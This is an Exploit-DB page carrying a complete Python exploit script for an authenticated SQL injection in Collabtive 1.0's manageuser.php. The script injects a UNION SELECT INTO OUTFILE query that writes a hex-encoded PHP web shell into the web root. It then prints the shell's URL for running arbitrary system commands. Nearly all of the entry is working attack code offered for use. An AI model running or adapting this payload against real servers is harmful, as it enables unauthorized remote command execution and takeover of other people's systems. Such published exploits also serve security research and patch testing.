Collabtive 1.0 - 'manageuser.php' SQL Injection

EDB-ID:

26410

CVE:


EDB Verified:

Author:

drone

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2013-06-24

Vulnerable App: 
# Exploit Title: Collabtive 1.0 SQLi
# Date: 06/17/2013
# Exploit Author: drone (@dronesec)
# More information: http://forelsec.blogspot.com/2013/06/collabtive-10-sqli.html
# Vendor homepage: http://collabtive.o-dyn.de/
# Software link: http://downloads.sourceforge.net/project/collabtive/collabtive/1.0/collabtive-10.zip
# Version: 1.0
# Fixed In: https://github.com/philippK-de/Collabtive 
# Tested on: Ubuntu 12.04 (apparmor disabled)

""" Collabtive 1.0 SQL injection web shell

    Requires authenticated user.
"""
from argparse import ArgumentParser
import string
import random
import urllib, urllib2
import sys

def run(options):
    print '[!] Dropping web shell on %s...'%options.ip

    shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))

    # <? php system($_GET["rr"]); ?>
    exploit = '{0}%20UNION%20SELECT%200x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e'\
              '%20INTO%20OUTFILE%20\'{1}/{2}.php\''.format(options.task,options.path,shell)

    query_string = 'action=profile&id={0}&project={1}&task={2}'.format(options.id,options.project,
                                                                        exploit)
    request = urllib2.build_opener()
    request.addheaders.append(('Cookie', 'PHPSESSID=%s'%options.session.strip()))

    try:
        request.open('http://{0}{1}/manageuser.php?{2}'.format(
                                                options.ip, options.rootp,query_string))
    except: pass
    print '[!] Shell dropped.  http://{0}{1}/{2}.php?rr=ls'.format(options.ip, options.rootp, shell)
def parse():
    parser = ArgumentParser()
    parser.add_argument("-i", help='server address', action='store', dest='ip', required=True)
    parser.add_argument('-P', help='valid php session id', action='store',
                        dest='session', required=True)
    parser.add_argument("-p", help='path to manageuser.php (/collabtive)',action='store',
                        default='/collabtive', dest='rootp')
    parser.add_argument("-w", help="writable web path (/var/www/collabtive)",action='store',
                        default='/var/www/collabtive', dest='path')
    parser.add_argument('--id', help='collab id (1)', action='store', default=1, dest='id')
    parser.add_argument('--project', help='project id (1)', action='store', default=1,
                        dest='project')
    parser.add_argument('--task', help='task id (1)', action='store', default=1,
                        dest='task')

    options = parser.parse_args()
    options.path = options.path if options.path[-1] != '/' else options.path[:-1]
    options.rootp = options.rootp if options.rootp[-1] != '/' else options.rootp[:-1]
    return options

if __name__=="__main__":
    run(parse())
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services